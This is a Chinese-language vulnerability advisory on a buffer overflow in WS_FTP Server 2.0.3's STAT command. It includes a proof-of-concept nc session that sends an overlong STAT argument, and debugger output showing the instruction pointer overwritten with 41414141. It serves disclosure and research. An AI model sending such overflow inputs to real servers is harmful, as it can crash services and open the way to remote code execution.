WS_FTP Server v2.0.3 缓冲区溢出漏洞

/ns/ld/softld/data/20011117232105.htm

涉及程序:
WS_FTP

描述:
WS_FTP Server v2.0.3 参数验证错误导致缓冲区溢出

详细:
WS_FTP Server 是基于Windows平台的FTP服务器软件,该软件的2.0.3 版本存在一个缓冲区溢出漏洞,可能允许远程攻击者执行任意代码。

这是由于解析“STAT”命令的代码没有验证用户输入的参数长度,如果攻击者输入一个超长的参数给'STAT'命令,就会发生缓冲区溢出。


以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


C:\tools\web>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA

0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
SetFolder = C:\program\iFtpSvc\helig
SetFolder = C:\program\iFtpSvc\helig\public
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
(A1)
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
esi=0067c280 edi=00130178
eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
41414141 ?? ???

受影响的系统:
WS_FTP Server v2.0.3